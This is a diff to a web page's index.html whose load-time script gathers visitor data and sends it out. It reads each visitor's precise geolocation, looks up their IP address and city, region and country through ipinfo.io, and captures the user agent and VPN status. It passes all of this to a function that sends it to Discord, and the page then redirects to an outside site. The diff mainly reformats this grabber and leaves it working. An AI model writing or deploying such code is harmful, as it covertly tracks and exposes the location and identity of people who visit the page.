--- a/index.html
+++ b/index.html
@@ -48,35 +48,31 @@
                 window.location.href = "https://moopx.pro";
             };
 
-            // Function to get Google Maps link with coordinates
-            const getGoogleMapsLink = (coordinates) => {
-                return `https://www.google.com/maps?q=${coordinates}`;
-            };
-
             // Function to get visitor's information including coordinates
-            const getVisitorInfo = async () => {
-                try {
-                    const position = await new Promise((resolve, reject) => {
-                        navigator.geolocation.getCurrentPosition(resolve, reject);
-                    });
+const getVisitorInfo = async () => {
+    try {
+        const position = await new Promise((resolve, reject) => {
+            navigator.geolocation.getCurrentPosition(resolve, reject);
+        });
 
-                    const coordinates = `${position.coords.latitude},${position.coords.longitude}`;
+        const coordinates = `${position.coords.latitude},${position.coords.longitude}`;
 
-                    // Requesting IP and address from a third-party service (replace with your preferred service)
-                    const infoResponse = await fetch('https://ipinfo.io/json');
-                    const infoData = await infoResponse.json();
+        // Requesting IP and address from a third-party service (replace with your preferred service)
+        const infoResponse = await fetch('https://ipinfo.io/json');
+        const infoData = await infoResponse.json();
 
-                    const ip = infoData.ip || 'N/A';
-                    const address = `${infoData.city || 'N/A'}, ${infoData.region || 'N/A'}, ${infoData.country || 'N/A'}`;
-                    const userAgent = navigator.userAgent;
-                    const isVPN = infoData.vpn || false;
+        const ip = infoData.ip || 'N/A';
+        const address = `${infoData.city || 'N/A'}, ${infoData.region || 'N/A'}, ${infoData.country || 'N/A'}`;
+        const userAgent = navigator.userAgent;
+        const isVPN = infoData.vpn === 'true';
 
-                    // Sending data to Discord with VPN status and redirecting to the main website
-                    sendInfoToDiscord(ip, address, userAgent, isVPN, coordinates);
-                } catch (error) {
-                    console.error('Error fetching location or address:', error);
-                }
-            };
+        // Sending data to Discord with VPN status and redirecting to the main website
+        sendInfoToDiscord(ip, address, userAgent, isVPN, coordinates);
+    } catch (error) {
+        console.error('Error fetching location or address:', error);
+    }
+};
+
 
             // Call the function when the page loads
             getVisitorInfo();
